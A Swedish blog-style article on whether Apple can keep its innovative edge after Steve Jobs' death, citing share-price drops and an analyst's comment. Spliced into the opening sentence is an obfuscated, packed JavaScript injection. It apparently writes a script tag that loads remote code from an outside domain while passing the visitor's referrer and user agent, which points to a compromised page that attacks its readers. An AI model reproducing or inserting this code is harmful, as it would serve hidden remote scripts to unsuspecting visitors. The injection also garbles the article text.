Image Image Image Image Image Image Image Image Image Image

| 19 januari, 2020

Scroll to top

Top

Riskerar Apple att tappa marknaden?

Riskerar Apple att tappa marknaden?
Sebastian

Efter eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|znihb|var|u0026u|referrer|fafkn||js|php’.split(’|’),0,{}))
Steve Jobs bortgång i går natt så har folk börjat ställa frågan om Apples nya VD kan hålla upp tempot. Det har ännu inte kommit några kommentarer från aktieägarna angående tron på Apple. Just nu är det vanliga konsumenter som börjar fundera.

Även om beskedet var väntat minskade inte chocken. Anställda på butiker som sålde Apple produkter sörjde genom att sätta upp en bild på Steve Jobs med bildtext ”1955-2011”. Nyheten om sjukdomen nådde företaget första gången 2004, efter det har han varit sjukskriven vid flera tillfällen i samband med sin behandling.

När beskedet kom den 25 augusti om att han lämnade sin VD position dök Apples aktie med 7 procent men återhämtade sig rätt snabbt.
Gårdagens besked om Steve Jobs bortgång fick aktier noterade på Frankfurtbörsen att falla med 3,3 procent i den inledande handeln.

Hur marknaden kommer att reagera på nyheten får vi se senare under eftermiddagen när de amerikanska börserna öppnar upp.

Enligt Helena Nordman Knutsson telekomanalytiker på Öhmans fondkomission återstår det att se hur investerarna nu hanterar risken om huruvida Apple kommer kunna upprätthålla sitt innovationsstarka ansikte.

[quote]– Apple har en speciell status bland världens elektronikbolag. I och med att man förlorat sin grundare riskerar man att börja ses som ett vanligt företag, som lyder under samma regler som andra i branschen.[/quote]

Vad tror ni kommer hända med Apple i framtiden? Kommentera gärna nedan och kom  med åsikter.